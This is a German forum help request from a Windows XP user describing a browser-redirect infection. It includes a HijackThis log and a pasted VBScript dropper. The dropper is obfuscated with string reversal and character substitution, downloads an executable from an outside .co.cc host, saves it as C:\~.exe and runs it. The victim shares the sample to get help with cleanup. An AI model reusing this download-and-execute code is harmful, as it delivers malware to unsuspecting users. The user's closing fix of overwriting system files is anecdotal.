Hi,

da ich Firefox 3.0 verwende habe ich mir offensichtlich etwas darüber eingefangen.

Mein System:
Win XP SP3

Symptome:
Normale Seitenaufrufe wurden / (werden?) auf werbeseiten umgeleitet.
Nach Aufruf des Internet Explorers 7 und Seitenaufruf hat sich dieser aufgehängt, die cmd.exe wurde kurz ausgeführt, ich hatte irgendeine kryptische vbscript-datei auf dem desktop - habe ich natürlich gelöscht. Dann hat mir Sygate angezeigt, meine Explorer.exe hätte sich verändert. Schnell bei Jotti hochgeladen - hxxp://virusscan.jotti.org/de/scanresult/0633043e1b907c431998d5d742d05f691c91ef32

In der VBScript-Datei stand:

Code: Alles auswählenAufklappen

ATTFilter

Execute(strReverse(Replace(Replace(")htap(cexe.lhs|2,htap elifotevas.oda|)ydoBesnopser.lmx(etirw.oda|nepo.oda|1=epyt.oda|3=edom.oda|dnes.lmx|0,Y6=e&1=f?php.daol/1/cc.oc.hg4gg4rg//:ptthY,YTEGY nepo.lmx|Yexe.~/:cY = htap|)Yllehs.tpircswY(tcejbOetaerC=lhs teS|)Ymaerts.bdodaY(tcejbOetaerC=oda teS|)Yptthlmx.tfosorcimY(tcejbOetaerC=lmx tes|txen emuser rorre no", "Y", chr(34)), "|", vbcrlf)))
         

..offensichtlich hat es sich in explorer.exe und winlogon.exe eingenistet.

Was ich getan habe:
HighJackThis - Nix gefunden
GMER - Nix gefunden
Spybot S&D - Nix gefunden

Gerade eben habe ich Malwarebytes AV installiert, mal sehen was das bringt.

HighJackThis Log:

Code: Alles auswählenAufklappen

ATTFilter

Logfile of Trend Micro HijackThis v2.0.4
Scan saved at 12:59:45, on 31.12.2010
Platform: Windows XP SP3 (WinNT 5.01.2600)
MSIE: Internet Explorer v7.00 (7.00.6000.16674)
Boot mode: Normal

Running processes:
C:\WINXP\System32\smss.exe
C:\WINXP\system32\winlogon.exe
C:\WINXP\system32\services.exe
C:\WINXP\system32\lsass.exe
C:\WINXP\system32\nvsvc32.exe
C:\WINXP\system32\svchost.exe
C:\WINXP\System32\svchost.exe
C:\Programme\Sygate\SPF\Smc.exe
C:\WINXP\System32\svchost.exe
C:\WINXP\System32\svchost.exe
C:\WINXP\System32\svchost.exe
C:\WINXP\system32\svchost.exe
C:\WINXP\Explorer.EXE
C:\Programme\Skype\Phone\Skype.exe
C:\Programme\Hamachi\hamachi.exe
C:\Programme\Mozilla Firefox\firefox.exe
L:\Install\Sicherheit\HijackThis.exe

R0 - HKCU\Software\Microsoft\Internet Explorer\Main,Start Page = file:///C:/Home/Home.html
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,SearchAssistant = 
R0 - HKLM\Software\Microsoft\Internet Explorer\Search,CustomizeSearch = 
O2 - BHO: Adobe PDF Reader Link Helper - {06849E9F-C8D7-4D59-B87D-784B7D6BE0B3} - C:\Programme\Adobe\Acrobat 7.0\ActiveX\AcroIEHelper.dll
O2 - BHO: Java(tm) Plug-In 2 SSV Helper - {DBC80044-A445-435b-BC74-9C25C1C588A9} - C:\Programme\Java\jre6\bin\jp2ssv.dll
O2 - BHO: JQSIEStartDetectorImpl - {E7E6F031-17CE-4C07-BC86-EABFE594F69C} - C:\Programme\Java\jre6\lib\deploy\jqs\ie\jqs_plugin.dll
O4 - HKLM\..\Run: [SmcService] C:\PROGRA~1\Sygate\SPF\smc.exe -startgui
O4 - HKLM\..\Run: [NvCplDaemon] RUNDLL32.EXE C:\WINXP\system32\NvCpl.dll,NvStartup
O4 - HKLM\..\RunOnce: [Malwarebytes' Anti-Malware (registration)] regsvr32.exe /s "C:\Programme\Malwarebytes' Anti-Malware\mbamext.dll"
O4 - HKLM\..\RunOnce: [Malwarebytes' Anti-Malware] C:\Programme\Malwarebytes' Anti-Malware\mbamgui.exe /install /silent
O10 - Unknown file in Winsock LSP: c:\programme\vmware\vmware player\vsocklib.dll
O10 - Unknown file in Winsock LSP: c:\programme\vmware\vmware player\vsocklib.dll
O18 - Protocol: skype4com - {FFC8B962-9B40-4DFF-9458-1830C7DD7F5D} - C:\PROGRA~1\GEMEIN~1\Skype\SKYPE4~1.DLL
O23 - Service: Avira AntiVir Personal - Free Antivirus Planer (AntiVirScheduler) - Avira GmbH - C:\Programme\Avira\AntiVir PersonalEdition Classic\sched.exe
O23 - Service: Avira AntiVir Personal - Free Antivirus Guard (AntiVirService) - Avira GmbH - C:\Programme\Avira\AntiVir PersonalEdition Classic\avguard.exe
O23 - Service: CrossLoop Service (CrossLoopService) - CrossLoop Inc - C:\Dokumente und Einstellungen\anonymous\Lokale Einstellungen\Anwendungsdaten\CrossLoop\CrossLoopService.exe
O23 - Service: Firebird Server - MAGIX Instance (FirebirdServerMAGIXInstance) - MAGIX® - C:\Programme\MAGIX\Common\Database\bin\fbserver.exe
O23 - Service: MagicTuneEngine - Unknown owner - C:\Programme\MagicTune Premium\MagicTuneEngine.exe
O23 - Service: MySQL - Unknown owner - C:\Programme\MySQL\MySQL.exe (file missing)
O23 - Service: NVIDIA Display Driver Service (nvsvc) - NVIDIA Corporation - C:\WINXP\system32\nvsvc32.exe
O23 - Service: Sandboxie Service (SbieSvc) - tzuk - C:\Programme\Sandboxie\SbieSvc.exe
O23 - Service: Sygate Personal Firewall Pro (SmcService) - Sygate Technologies, Inc. - C:\Programme\Sygate\SPF\Smc.exe
O23 - Service: TightVNC Server (tvnserver) - GlavSoft LLC. - C:\Dokumente und Einstellungen\anonymous\Lokale Einstellungen\Anwendungsdaten\CrossLoop\tvnserver.exe
O23 - Service: VMware Agent Service (ufad-ws60) - VMware, Inc. - C:\Programme\VMware\VMware Player\vmware-ufad.exe
O23 - Service: Messenger USN Journal Reader-Service für freigegebene Ordner (usnjsvc) - Unknown owner - C:\Programme\MSN Messenger\usnsvc.exe (file missing)
O23 - Service: VMware Authorization Service (VMAuthdService) - VMware, Inc. - C:\Programme\VMware\VMware Player\vmware-authd.exe
O23 - Service: VMware DHCP Service (VMnetDHCP) - VMware, Inc. - C:\WINXP\system32\vmnetdhcp.exe
O23 - Service: VMware USB Arbitration Service (VMUSBArbService) - VMware, Inc. - C:\Programme\Common Files\VMware\USB\vmware-usbarbitrator.exe
O23 - Service: VMware NAT Service - VMware, Inc. - C:\WINXP\system32\vmnat.exe

--
End of file - 4143 bytes
         

Es wäre toll, wenn mich jemand an die Hand nehmen könnte, um das zu bereinigen ohne meinen PC neu zu installieren.

Gruss

GF

Sogar Trojaner-board wird manchmal zu Click2mix.info umgeleitet.. Malwarebytes hat nichts gefunden.

Problem hat sich (für mich) erledigt, ich hab ein weiteres Windows in einen anderen Ordner installiert und aus diesem heraus die explorer.exe un winlogon.exe in meiner Arbeitsversion von windows überschrieben, dann einfach neugestartet und weg isser
Seitdem keine Probleme mehr ^^